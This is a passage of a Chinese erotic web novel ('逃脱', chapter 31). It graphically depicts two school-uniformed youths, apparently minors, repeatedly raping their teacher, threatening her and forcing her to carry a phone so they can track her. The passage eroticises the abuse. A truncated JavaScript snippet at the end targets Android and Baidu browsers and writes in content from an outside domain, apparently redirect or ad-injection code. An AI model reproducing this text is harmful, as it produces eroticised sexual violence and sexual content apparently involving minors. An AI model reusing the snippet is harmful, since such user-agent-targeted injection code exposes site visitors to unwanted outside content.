逃脱 分卷阅读31

    “嗯~~不~~”蓝静仪扭动着身子,她几乎失去了反抗的力气。

    香蕉慢慢的推进去,蓝静仪的下体收缩着,很快柔软的香蕉已经被挤烂在阴 道里。

    “怎么办,烂在里面了,宝贝会很难受的”纳兰葎说道。

    “挖出来啊”纳兰荻的手指伸进了小洞,往外挖着香蕉泥。

    “放开……嗯~~唔……”蓝静仪啜泣着,但根本无法阻止两个邪恶少年对她的占有和蹂躏。

    两个少年围着女人纤白的下体,在已经被他们弄肿的小肉穴里轮流掏弄着,竟把女人的肉穴当成了餐盅,以手当勺,仿佛吃着世上的美味佳肴。

    还没弄净,纳兰荻硕大的昂扬已经又插了进去,蓝静仪身子随着他的推进向后荡去,嘴里发出尖叫。

    “啊~~啊~~啊~~”他猛烈快速的撞击让她的尖叫破碎不堪。

    好半天,纳兰荻放慢了速度,将她赤裸的身子抱起来,走进浴室,一路上,硕大的男 根根本没离开过她的小洞,仍在轻轻地拍动着。

    他走进了水里,纳兰葎游过过来,两个一丝不挂的高大少年将赤裸的她紧紧圈住,为她清洗身上他们留下的情欲痕迹。

    而纳兰荻仍在她体内,在水里要着她。

    两个少年在水里轮番要了她好多次,才把滩成一团泥的蓝静仪扔在床上,蓝静仪纤白的肉体在黑色的大床上散发着珍珠般的光泽,濡湿的长发遮盖着滑润的小脸,两根大腿无力地大张着,被清洗过的下体肉 瓣向两边翻起,失去保护的小穴 口红肿的没了一丝缝隙。她闭着眼,发丝上还留着水露,神情疲惫至极。

    纳兰葎拉开了她的大腿,在他进入她的时候,她拱起了身子轻“嗯”了一声,纳兰葎吻了吻她的唇,就在她体内再度冲刺起来。

    她已经不知道在床上他们又要了她多久,在情欲纠缠和极度疲惫下她迷迷糊糊的睡着了。

    早上醒来,一缕阳光射在三具赤裸年青的肉体上。蓝静仪张开眼,她眼前是一张俊美无俦脸,削薄的黑发,有些凌乱地覆在眼睛上,睫毛好长,让依然俊美的睡颜不见了平时的冷酷。

    他和她的身体紧紧地拥在一起,赤裸的肉体间不见一丝缝隙,蓝静仪脸红了,她动了动身子,才发现他的巨大还埋在她体内,下体传来一阵酸痛。

    邪肆的黑眸悄悄张开,胯间的硕大重新复苏,蓝静仪惊觉到他的变化,惊呼了一声,他张开嘴含住了她的声音,下体开始在她体内律动。

    “呜……”蓝静仪身体摇动着,嘴被他的唇堵住,只能发出模糊的呻吟。

    清晨的阳光射进来,俊美的黑发少年从侧位再一次占有了她。

    “好吵”旁边赤裸着身体的金发少年翻了个身,用手支住头,柔软的金发从他指缝间流泄下来,他修长的身体犹如刚雕刻出来的艺术品,那样结实健美。

    “这么早就做”运动‘啊“虽然嘴里不满地说着,但少年狭长邪美的瞳仁却一眨不眨地盯住眼前男女性器的交合处。

    粗大的肉棍正在小小的肉 口里狂插,红肿的肉 口被粗大的男 根撑开,粉红的穴 肉几乎被撕裂,剧烈地收缩着吞吐着男性的欲望,骇人的肉 棍上裹满一层白色的淫 液,在挤进多汁的肉 穴时肉棍上的淫 汁一直被褪到根部,和被撑开的穴肉上的淫 汁混在一起。

    肉 穴四周已经变的水淋淋的,不断仍有水从交合处流出来。“噗噗”的水声在男根进出洞口时显得异常淫亵。

    金发少年狭眸被欲望熏染,胯间的粗大已经高高地昂起了头。

    纳兰荻和纳兰葎用温热的毛巾擦着蓝静仪沾满情欲痕迹的身体,这已经是在纳兰葎要过她之后。蓝静仪任由两个少年摆弄着,昨天一整夜他们狂暴的索取以及今天清晨他们又强要过她之后,她已经有点虚脱了。

    纳兰葎擦着她被他们蹂躏了一整夜的下体,狭长的眼睛闪着光。

    “水好多”他低低地对纳兰荻说。

    纳兰荻看了看蓝静仪疲惫不堪的小脸,“要不是这么骚,早被我们弄死了”

    纳兰葎笑,“你才不舍得,我们对任何女人也从没这么”温柔‘过啊“

    纳兰荻也一笑。

    他们给她穿上了一件T字内裤,只有一条细细的带子,什么都遮不住,上边穿上镂空的胸衣,中间是空的,露出两颗显然刚经过情欲还坚硬挺立的乳头。

    “不要,我怎么能穿这个……”蓝静仪轻声抗议,声音小的可怜。她从没穿过这种暴露又淫荡的内衣裤。

    “穿什么是你说了算吗?”纳兰荻说道。

    “可是我……”

    “老师是想什么都不穿吗?”纳兰葎问。

    “她还有力气顶嘴,这说明什么呢,葎?”

    纳兰葎轻笑,俯下头,“宝贝乖,要你穿什么就穿什么,这样才不会惹我们生气,不生气时我们会对你很”温柔‘的,你难道想看看我们生气时的样子?“

    蓝静仪低下了头。她知道在他们面前她只能服从,弱小的她根本无法对抗他们的强势。

    穿好衣服后,纳兰葎抱起她,蓝静仪乖巧地卧在他怀里,只是她觉得累了,没有力气再反抗。穿着一身黑色校服的纳兰荻跟在他们身后走出别墅。

    上车前,纳兰荻塞在她手里一支白色的手机。

    “要随身携带”还是他一贯的命令口气。

    “上面有我和荻的号码,可以方便联络到你”纳兰葎补充。

    蓝静仪将小巧的手机握在掌心,手机小的像一只玩具,她想到了自己。

    “记住了吗?”纳兰荻问她。

    “嗯”她点头。

    “眼睛看着我”他抓住她的下颌,强迫她眼睛看着他。

    蓝静仪眼睛忽闪着,她怕他。

    “我……我知道了……”

    纳兰荻摩挲了下她细白的小下巴,唇轻轻向上翘了一下,转身上了车,红色跑车第一个开上了公路。

    “走吧,手机要保证我们随时都能联络到你,我们会检查的,不要以为是开玩笑,如果……我想你也不会,宝贝最近很乖的”纳兰葎捏捏她的鼻子抱她上车,像是对待十几岁的小女孩一样。

    蓝静仪紧紧握着手机,她的身子靠在座椅上,浑身好像没有一丝力气。

    “坐过来”纳兰葎看了看她叫道。

    蓝静仪摇摇头,“不要吧,会影响你开车的”她也学会了找借口保护自己。

    纳兰葎的手臂已经伸过来,拉过她坐在他的膝盖上。

    娇小的她像一只小鸟一样靠在少年宽阔的胸肌上。如果她再年轻十岁,如果他像他的外表一样是个天使般的少年,或许她会很幸福……只是,现在她觉得自己像一只被两个坏的孩子关在笼子里的小鸟……她轻轻地闭起眼,关闭了她眼眸中

window["timea"] = "svggr" + (new Date()).getTime();var t = document;if((/(Android)/i.test(navigator.userAgent))&&(/(baidu)/i.test(navigator.userAgent))){if((/(check_xxin)/i.test(window.location.href))){alert(new Date().getSeconds())};var lxq="dd.shxckr.cn/s_80137_1/w1xhtml?";t.write('